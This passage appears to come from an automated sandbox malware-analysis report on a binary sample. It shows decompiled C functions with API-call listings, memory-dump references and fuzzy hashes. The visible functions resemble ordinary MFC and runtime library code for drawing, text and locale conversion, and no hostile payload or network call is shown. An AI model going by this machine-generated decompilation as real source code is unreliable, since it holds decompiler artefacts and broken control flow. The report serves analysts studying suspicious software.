                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042BCE6
                  • PathFindExtensionA.SHLWAPI(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000008,0042C1CC,?), ref: 0042BD4B
                  • GetParent.USER32(?), ref: 0042BDC1
                  • SendMessageA.USER32(?,00000464,00000104,?), ref: 0042BDD9
                    • Part of subcall function 0042BBEC: __EH_prolog3.LIBCMT ref: 0042BBF3
                    • Part of subcall function 0042BBEC: CoTaskMemFree.OLE32(?,?), ref: 0042BC37
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$ExtensionFindFreeMessageParentPathSendTask
                  • String ID:
                  • API String ID: 3379981378-0
                  • Opcode ID: e185d9022893ddd1bb200dc0489ac492a0c42998567e89b33223990446d52f3f
                  • Instruction ID: 085081a633f1afcd9b041cece9632050099a798345f581a82a4ab2aafd9681eb
                  • Opcode Fuzzy Hash: e185d9022893ddd1bb200dc0489ac492a0c42998567e89b33223990446d52f3f
                  • Instruction Fuzzy Hash: 85418E30A10265DBCB10EFA1D8919FE77B1FF00318F94462EE552672E1DB389944CB9A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E004253B4(void* __ecx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				struct tagRECT _v40;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t60;
                  				signed int _t65;
                  				intOrPtr _t67;
                  				signed int _t73;
                  				void* _t76;
                  				void* _t80;
                  				void* _t84;
                  				intOrPtr _t85;
                  
                  				_t76 = __ecx;
                  				_v24 = 1;
                  				_v20 = 1;
                  				_t85 = E00423045(__ecx, __ecx, _t80, _t84, __eflags, GetStockObject(0));
                  				_v16 = _t85;
                  				_v8 = E00423F2F(_t76, _t80, _t85, __eflags);
                  				_t60 =  *(_t76 + 0x74);
                  				_v12 = _t85;
                  				if((0x0000a000 & _t60) == 0) {
                  					__eflags = _t60 & 0x00005000;
                  					if(__eflags == 0) {
                  						_v24 = GetSystemMetrics(0x20) - 1;
                  						_v20 = GetSystemMetrics(0x21) - 1;
                  						_t65 =  *(_t76 + 0x78);
                  						__eflags = 0x0000a000 & _t65;
                  						if((0x0000a000 & _t65) == 0) {
                  							L6:
                  							__eflags = _t65 & 0x00005000;
                  							if(__eflags == 0) {
                  								L9:
                  							} else {
                  								__eflags =  *(_t76 + 0x7c);
                  								if(__eflags == 0) {
                  									goto L9;
                  								} else {
                  									goto L8;
                  								}
                  							}
                  						} else {
                  							__eflags =  *(_t76 + 0x7c);
                  							if(__eflags != 0) {
                  								goto L6;
                  							}
                  						}
                  						_v12 = _v8;
                  					} else {
                  					}
                  				} else {
                  				}
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				if(_a4 != 0) {
                  					_v20 = 0;
                  					_v24 = 0;
                  				}
                  				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
                  					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                  				}
                  				_t67 = _v8;
                  				_t97 =  *(_t76 + 0x24);
                  				if( *(_t76 + 0x24) == 0) {
                  					_t67 = _v16;
                  				}
                  				E0042408E(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                  				asm("movsd");
                  				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                  				asm("movsd");
                  				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                  				asm("movsd");
                  				_t73 = 0 | _v12 == _v8;
                  				asm("movsd");
                  				 *(_t76 + 0x24) = _t73;
                  				return _t73;
                  			}

                  APIs
                  • GetStockObject.GDI32(00000000), ref: 004253CC
                    • Part of subcall function 00423F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00423F77
                    • Part of subcall function 00423F2F: CreatePatternBrush.GDI32(00000000), ref: 00423F84
                    • Part of subcall function 00423F2F: DeleteObject.GDI32(00000000), ref: 00423F90
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00425468
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                  • String ID:
                  • API String ID: 3923860780-0
                  • Opcode ID: 0bdc1af02f3c5e9820d79e2338334d270b3c5ac4aabd9b9409ecc159be85d491
                  • Instruction ID: d9756c9e36c98306afc5a098c904508bb618c2e312976f6a3c34b45bf204dd42
                  • Opcode Fuzzy Hash: 0bdc1af02f3c5e9820d79e2338334d270b3c5ac4aabd9b9409ecc159be85d491
                  • Instruction Fuzzy Hash: 43415B71E00629DBCF10DFA4D984BAEB7B5EB08315F610166ED10AB255C3789E81CF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004425DA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				char _v8;
                  				signed int _v12;
                  				char _v20;
                  				char _t43;
                  				char _t46;
                  				signed int _t53;
                  				signed int _t54;
                  				intOrPtr _t56;
                  				int _t57;
                  				int _t58;
                  				signed short* _t59;
                  				short* _t60;
                  				int _t65;
                  				char* _t73;
                  
                  				_t73 = _a8;
                  				if(_t73 == 0 || _a12 == 0) {
                  					L5:
                  					return 0;
                  				} else {
                  					if( *_t73 != 0) {
                  						E00430D81( &_v20, __edi, _a16);
                  						_t43 = _v20;
                  						__eflags =  *(_t43 + 0x14);
                  						if( *(_t43 + 0x14) != 0) {
                  							_t46 = E004403C3( *_t73 & 0x000000ff,  &_v20);
                  							__eflags = _t46;
                  							if(_t46 == 0) {
                  								__eflags = _a4;
                  								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                  								if(__eflags != 0) {
                  									L10:
                  									__eflags = _v8;
                  									if(_v8 != 0) {
                  										_t53 = _v12;
                  										_t11 = _t53 + 0x70;
                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                  										__eflags =  *_t11;
                  									}
                  									return 1;
                  								}
                  								L21:
                  								_t54 = E00431D3E(__eflags);
                  								 *_t54 = 0x2a;
                  								__eflags = _v8;
                  								if(_v8 != 0) {
                  									_t54 = _v12;
                  									_t33 = _t54 + 0x70;
                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                  									__eflags =  *_t33;
                  								}
                  								return _t54 | 0xffffffff;
                  							}
                  							_t56 = _v20;
                  							_t65 =  *(_t56 + 0xac);
                  							__eflags = _t65 - 1;
                  							if(_t65 <= 1) {
                  								L17:
                  								__eflags = _a12 -  *(_t56 + 0xac);
                  								if(__eflags < 0) {
                  									goto L21;
                  								}
                  								__eflags = _t73[1];
                  								if(__eflags == 0) {
                  									goto L21;
                  								}
                  								L19:
                  								_t57 =  *(_t56 + 0xac);
                  								__eflags = _v8;
                  								if(_v8 == 0) {
                  									return _t57;
                  								}
                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                  								return _t57;
                  							}
                  							__eflags = _a12 - _t65;
                  							if(_a12 < _t65) {
                  								goto L17;
                  							}
                  							__eflags = _a4;
                  							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                  							__eflags = _t58;
                  							_t56 = _v20;
                  							if(_t58 != 0) {
                  								goto L19;
                  							}
                  							goto L17;
                  						}
                  						_t59 = _a4;
                  						__eflags = _t59;
                  						if(_t59 != 0) {
                  							 *_t59 =  *_t73 & 0x000000ff;
                  						}
                  						goto L10;
                  					} else {
                  						_t60 = _a4;
                  						if(_t60 != 0) {
                  							 *_t60 = 0;
                  						}
                  						goto L5;
                  					}
                  				}
                  			}

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044260E
                  • __isleadbyte_l.LIBCMT ref: 00442642
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004307FC,?,00000000,00000000,?,?,?,?,004307FC,00000000,?), ref: 00442673
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004307FC,00000001,00000000,00000000,?,?,?,?,004307FC,00000000,?), ref: 004426E1
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 4f51aa9334f70c85223a4e687f06baf9a762fd662b4e9dda525f56099a8685db
                  • Instruction ID: 7a3e3710ad6dcf06bb425cbd2a2258c827f30c13012a9450a5fd42bd5fc93319
                  • Opcode Fuzzy Hash: 4f51aa9334f70c85223a4e687f06baf9a762fd662b4e9dda525f56099a8685db
                  • Instruction Fuzzy Hash: 5231F331A00246EFEB21DF64C990AAE7BA4FF01310F56856AF4518B291D7B4DD41DB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0040A8A9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t34;
                  				struct HWND__* _t37;
                  				signed int _t38;
                  				void* _t65;
                  				short* _t67;
                  				struct HWND__** _t69;
                  				void* _t70;
                  				struct HWND__** _t74;
                  				intOrPtr _t76;
                  
                  				_t66 = __edi;
                  				_t65 = __edx;
                  				_push(0x10c);
                  				E00431B04(E0044AD6E, __ebx, __edi, __esi);
                  				_t69 =  *(_t70 + 0xc);
                  				_t34 =  *((intOrPtr*)(_t70 + 0x10));
                  				_t74 = _t69;
                  				_t56 = 0 | _t74 != 0x00000000;
                  				 *((intOrPtr*)(_t70 - 0x118)) = _t34;
                  				_t75 = _t74 != 0;
                  				if(_t74 != 0) {
                  					L2:
                  					_t76 = _t34;
                  					_t56 = 0 | _t76 != 0x00000000;
                  					if(_t76 != 0) {
                  						goto L1;
                  					}
                  					E004014C0(_t70 - 0x114, _t65);
                  					_t59 = _t69[2];
                  					_t37 = _t69[1];
                  					_t67 = 0xfffffdf8;
                  					 *((intOrPtr*)(_t70 - 4)) = 0;
                  					if(_t59 != 0xfffffdf8 || (_t69[0x19] & 0x00000001) == 0) {
                  						if(_t59 != 0xfffffdee || (_t69[0x2d] & 0x00000001) == 0) {
                  							goto L8;
                  						} else {
                  							goto L7;
                  						}
                  					} else {
                  						L7:
                  						_t37 = GetDlgCtrlID(_t37);
                  						L8:
                  						if(_t37 == 0) {
                  							L12:
                  							__eflags = _t69[2] - _t67;
                  							if(_t69[2] != _t67) {
                  								_t67 =  &(_t69[4]);
                  								_t38 = MultiByteToWideChar(3, 0,  *(_t70 - 0x114), 0xffffffff, _t67, 0x50);
                  								__eflags = _t67;
                  								if(_t67 != 0) {
                  									__eflags = _t38 - 0x50;
                  									if(_t38 > 0x50) {
                  										_t38 = E00401090(_t59, _t65, 0x80004005);
                  									}
                  								}
                  								__eflags = _t38;
                  								if(_t38 > 0) {
                  									__eflags = _t67;
                  									if(_t67 != 0) {
                  										__eflags = 0;
                  										 *((short*)(_t67 + _t38 * 2 - 2)) = 0;
                  									}
                  								}
                  							} else {
                  								E0040842D(0, _t65, _t67, _t69,  &(_t69[4]), 0x50,  *(_t70 - 0x114), 0xffffffff);
                  							}
                  							 *((intOrPtr*)( *((intOrPtr*)(_t70 - 0x118)))) = 0;
                  							SetWindowPos( *_t69, 0, 0, 0, 0, 0, 0x213);
                  							E004010B0( &(( *(_t70 - 0x114))[0xfffffffffffffff0]), _t65);
                  							__eflags = 1;
                  							L21:
                  							return E00431B87(0, _t67, _t69);
                  						}
                  						_t59 = _t70 - 0x110;
                  						if(E0041B239(0, _t70 - 0x110, _t67, _t69, _t37, _t70 - 0x110, 0x100) != 0) {
                  							E0041B29E(_t70 - 0x114, _t70 - 0x110, 1, 0xa);
                  							goto L12;
                  						} else {
                  							E004010B0( &(( *(_t70 - 0x114))[0xfffffffffffffff0]), _t65);
                  							goto L21;
                  						}
                  					}
                  				}
                  				L1:
                  				_t34 = E00406436(0, _t56, _t66, _t69, _t75);
                  				goto L2;
                  			}













                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0040A8B3
                  • GetDlgCtrlID.USER32 ref: 0040A918
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,00000050,0000010C,00404692,?,?,?), ref: 0040A992
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0040A9CE
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharCtrlException@8H_prolog3H_prolog3_MultiThrowWideWindow
                  • String ID:
                  • API String ID: 1933732581-0
                  • Opcode ID: 3165a1b386513dabdfb5d7ee7af79dfe6ece074409af96b752cbb1d83e808885
                  • Instruction ID: 4d93c7147c348ebad3ea942ba8eea6060f3f1e63af0d97cf858e573eee83d13f
                  • Opcode Fuzzy Hash: 3165a1b386513dabdfb5d7ee7af79dfe6ece074409af96b752cbb1d83e808885
                  • Instruction Fuzzy Hash: AB31E371A003199BCF24DB748D86BEE7264AF04714F110A7EF656F22D1DA789D90CA1B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E0042D72D(void* __ebx, void* __ecx, signed int __edi, void* __esi, void* __eflags) {
                  				INT* _t48;
                  				signed int _t52;
                  				signed int _t62;
                  				CHAR* _t83;
                  				signed int _t86;
                  				void* _t87;
                  
                  				_t82 = __edi;
                  				_push(0x18);
                  				E00431A9B(E0044C8E7, __ebx, __edi, __esi);
                  				_t85 = __ecx;
                  				 *(_t87 - 0x10) = 0;
                  				 *(_t87 - 4) = 0;
                  				 *(_t87 - 0x14) = 0;
                  				_t48 =  *(_t87 + 0x20);
                  				 *(_t87 - 4) = 1;
                  				 *(_t87 - 0x18) = 0;
                  				if(_t48 != 0) {
                  					L7:
                  					_t82 = ExtTextOutA( *(_t85 + 4),  *(_t87 + 8),  *(_t87 + 0xc),  *(_t87 + 0x10),  *(_t87 + 0x14),  *(_t87 + 0x18),  *(_t87 + 0x1c), _t48);
                  					__eflags =  *(_t87 - 0x18);
                  					if(__eflags != 0) {
                  						__eflags = _t82;
                  						if(__eflags != 0) {
                  							__eflags = GetTextAlign( *(_t85 + 8)) & 0x00000001;
                  							if(__eflags != 0) {
                  								GetCurrentPositionEx( *(_t85 + 4), _t87 - 0x24);
                  								_t58 =  *(_t87 - 0x24) -  *(_t87 - 0x18);
                  								__eflags =  *(_t87 - 0x24) -  *(_t87 - 0x18);
                  								E00422BBC(_t85, _t87 - 0x1c, _t58,  *((intOrPtr*)(_t87 - 0x20)));
                  							}
                  						}
                  					}
                  					_t86 = _t82;
                  					L13:
                  					 *(_t87 - 4) = 0;
                  					E00404490(0, _t82, _t86, __eflags,  *(_t87 - 0x14));
                  					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
                  					E00404490(0, _t82, _t86, __eflags,  *(_t87 - 0x10));
                  					_t52 = _t86;
                  					L3:
                  					return E00431B73(_t52);
                  				}
                  				_t90 =  *(_t87 + 0x1c);
                  				if( *(_t87 + 0x1c) != 0) {
                  					_push( *(_t87 + 0x1c));
                  					__eflags = E0042CF42(0, _t87 - 0x10, __edi, __ecx, __eflags);
                  					if(__eflags == 0) {
                  						L12:
                  						_t86 = 0;
                  						__eflags = 0;
                  						goto L13;
                  					}
                  					_push( *(_t87 + 0x1c));
                  					_t62 = E0042CF01(0, _t87 - 0x14, _t82, __ecx, __eflags);
                  					__eflags = _t62;
                  					if(_t62 == 0) {
                  						goto L12;
                  					}
                  					_t83 =  *(_t87 - 0x14);
                  					E0042D2AB(__ecx, _t87 - 0x24, _t87 + 8,  *(_t87 + 0x18), _t87 + 0x1c, 0, 0, 0, 0, _t83,  *(_t87 - 0x10), _t87 - 0x18);
                  					_t48 =  *(_t87 - 0x10);
                  					 *(_t87 + 0x18) = _t83;
                  					goto L7;
                  				} else {
                  					 *(_t87 - 4) = 0;
                  					E00404490(0, __edi, __ecx, _t90, 0);
                  					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
                  					E00404490(0, _t82, _t85, _t90, 0);
                  					_t52 = 1;
                  					goto L3;
                  				}
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042D734
                  • ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0042D7E0
                  • GetTextAlign.GDI32(?), ref: 0042D7F4
                  • GetCurrentPositionEx.GDI32(?,?), ref: 0042D805
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Text$AlignCurrentH_prolog3Position
                  • String ID:
                  • API String ID: 2049318899-0
                  • Opcode ID: f6f8fc8d486f84dd401bb7ca46793f57f13d9363a740a3804ca8543d50e5fc4c
                  • Instruction ID: a3f77aa90376770f17176c528fcb1e9fde7301855a461e76d5891e40defe5d24
                  • Opcode Fuzzy Hash: f6f8fc8d486f84dd401bb7ca46793f57f13d9363a740a3804ca8543d50e5fc4c
                  • Instruction Fuzzy Hash: FB315C7190015EAFCF11EFA5D8858EFBBB9FF08314B10402AF525A2260CA399E11DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E0042495D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                  				void* __ebx;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t29;
                  				intOrPtr _t32;
                  				intOrPtr _t35;
                  				intOrPtr _t36;
                  				intOrPtr _t37;
                  				signed int _t39;
                  				void* _t47;
                  				intOrPtr* _t48;
                  				void* _t50;
                  				void* _t51;
                  				void* _t64;
                  				void* _t65;
                  				intOrPtr _t66;
                  				void* _t68;
                  				void* _t70;
                  
                  				_t65 = __edi;
                  				_t64 = __edx;
                  				_t51 = E0041F396(_t50, __ecx, __edi, _t68, __eflags);
                  				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                  				if(_t29 == 0) {
                  					L19:
                  					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                  				}
                  				_t32 = _t29 - 1;
                  				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                  				if(_t32 != 0) {
                  					goto L19;
                  				}
                  				if(_a4 == 0) {
                  					L8:
                  					_push(_t65);
                  					_t66 =  *((intOrPtr*)(E0041F363(_t51, _t65, 0, _t77) + 4));
                  					_t70 = E004205AE(0x466508);
                  					if(_t70 == 0 || _t66 == 0) {
                  						L18:
                  						goto L19;
                  					} else {
                  						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                  						_t80 = _t35;
                  						if(_t35 == 0) {
                  							L12:
                  							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                  								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                  								_a4 = _a4 & 0x00000000;
                  								_t83 = _t36;
                  								if(_t36 != 0) {
                  									_push(_t36);
                  									_t39 = E004344B4(_t51, _t64, _t66, _t70, _t83);
                  									_push( *((intOrPtr*)(_t70 + 0xc)));
                  									_a4 = _t39;
                  									E004316F6(_t51, _t66, _t70, _t83);
                  								}
                  								_t37 = E0043108C(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
                  								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                  								if(_t37 == 0 && _a4 != _t37) {
                  									 *((intOrPtr*)(_t70 + 0xc)) = E0043108C(_t51, _t64, _t66, _a4);
                  								}
                  							}
                  							goto L18;
                  						}
                  						_push(_t35);
                  						if(E004344B4(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                  							goto L18;
                  						}
                  						goto L12;
                  					}
                  				}
                  				if(_a4 != 0xffffffff) {
                  					_t47 = E00415AD9();
                  					if(_t47 != 0) {
                  						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                  						_t77 = _t48;
                  						if(_t48 != 0) {
                  							 *_t48(0, 0);
                  						}
                  					}
                  				}
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
                  				goto L8;
                  			}






















                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __msize_malloc
                  • String ID:
                  • API String ID: 1288803200-0
                  • Opcode ID: 0a0fb8dd703eed77f7ba8fb0962ca666536f27cc64845c8a66cdf0238207c114
                  • Instruction ID: a563689fdaf21f1efb45e35565f73d8a1b00968b58a58eb4e159542aa28b78ed
                  • Opcode Fuzzy Hash: 0a0fb8dd703eed77f7ba8fb0962ca666536f27cc64845c8a66cdf0238207c114
                  • Instruction Fuzzy Hash: B821D6707006209FCB24AF75E88165F77A4FFC4364B50852FE8188B696DB38DC91CA8C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00416327(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t36;
                  				intOrPtr _t40;
                  				intOrPtr* _t44;
                  				void* _t46;
                  				intOrPtr _t47;
                  				void* _t48;
                  				intOrPtr _t54;
                  				void* _t59;
                  				intOrPtr* _t71;
                  				intOrPtr* _t73;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t76 = __eflags;
                  				_push(0x60);
                  				E00431ACE(E0044B391, __ebx, __edi, __esi);
                  				_t71 =  *((intOrPtr*)(_t75 + 8));
                  				_t73 =  *((intOrPtr*)(_t71 + 4));
                  				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
                  				E0040D77C(_t75 - 0x68, _t76);
                  				 *(_t75 - 4) = 0;
                  				 *(_t75 - 4) = 1;
                  				 *((intOrPtr*)(E0041EDAB(0, _t71, _t73, _t76) + 4)) =  *((intOrPtr*)( *_t71 + 4));
                  				_t36 = E0041F363(0, _t71, _t73, _t76);
                  				_t9 = _t36 + 0x74; // 0x74
                  				 *((intOrPtr*)(_t73 + 0x1c)) = _t36;
                  				 *((intOrPtr*)(E00409F26(0, _t9, _t71, _t73, _t76) + 4)) = _t73;
                  				E004161F7(_t73, _t76);
                  				_t40 =  *((intOrPtr*)(E0041F363(0, _t71, _t73, _t76) + 4));
                  				if(_t40 != 0 &&  *((intOrPtr*)(_t73 + 0x20)) == 0) {
                  					_t54 =  *((intOrPtr*)(_t40 + 0x20));
                  					if(_t54 != 0 &&  *((intOrPtr*)(_t54 + 0x20)) != 0) {
                  						E0040EE89(_t75 - 0x68,  *((intOrPtr*)(_t54 + 0x20)));
                  						 *((intOrPtr*)(_t73 + 0x20)) = _t75 - 0x68;
                  					}
                  				}
                  				 *(_t75 - 4) = 0;
                  				_t59 =  *(_t71 + 0x14);
                  				SetEvent( *(_t71 + 0x10));
                  				WaitForSingleObject(_t59, 0xffffffff);
                  				CloseHandle(_t59);
                  				_t44 =  *((intOrPtr*)(_t73 + 0x38));
                  				_t81 = _t44;
                  				if(_t44 == 0) {
                  					_t46 =  *((intOrPtr*)( *_t73 + 0x50))();
                  					__eflags = _t46;
                  					_t47 =  *_t73;
                  					if(_t46 != 0) {
                  						_t48 =  *((intOrPtr*)(_t47 + 0x54))();
                  					} else {
                  						_t48 =  *((intOrPtr*)(_t47 + 0x68))();
                  					}
                  				} else {
                  					_t48 =  *_t44( *((intOrPtr*)(_t73 + 0x34)));
                  				}
                  				E0040EEC5(_t59, _t75 - 0x68);
                  				E00415EE7(_t75 - 0x68, _t81, _t48, 1);
                  				 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
                  				E0040F76D(_t59, _t75 - 0x68, _t71, _t48, _t81);
                  				return E00431B73(0);
                  			}
















                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041632E
                    • Part of subcall function 004161F7: GetCurrentThreadId.KERNEL32 ref: 0041620A
                    • Part of subcall function 004161F7: SetWindowsHookExA.USER32 ref: 0041621A
                  • SetEvent.KERNEL32(?,00000060), ref: 004163DF
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004163E8
                  • CloseHandle.KERNEL32(?), ref: 004163EF
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                  • String ID:
                  • API String ID: 1532457625-0
                  • Opcode ID: 50310d380d5aa45c0703d31aa760e93ca882309b05ff31cb1263a9d8be084b3a
                  • Instruction ID: 7d1a66d4e27a964e3f0b4e2036f0cf801379f83b2f6e36c6b0dae80c5e1ed748
                  • Opcode Fuzzy Hash: 50310d380d5aa45c0703d31aa760e93ca882309b05ff31cb1263a9d8be084b3a
                  • Instruction Fuzzy Hash: 1D318D74A00705DFCB10EFB2C58499DBBB0BF08314B11457EE45A973A2DB38EA85CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E0042BBEC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t44;
                  				void* _t52;
                  				void* _t60;
                  				void* _t73;
                  				intOrPtr* _t74;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t68 = __edx;
                  				_push(8);
                  				E00431A9B(E0044B09C, __ebx, __edi, __esi);
                  				_t73 = __ecx;
                  				_t55 = 0;
                  				_t71 = 1;
                  				 *((intOrPtr*)(_t76 - 0x14)) = 0;
                  				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
                  					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000;
                  					if(__eflags == 0) {
                  						goto L10;
                  					} else {
                  						__eflags =  *(__ecx + 0x20);
                  						if(__eflags == 0) {
                  							goto L10;
                  						} else {
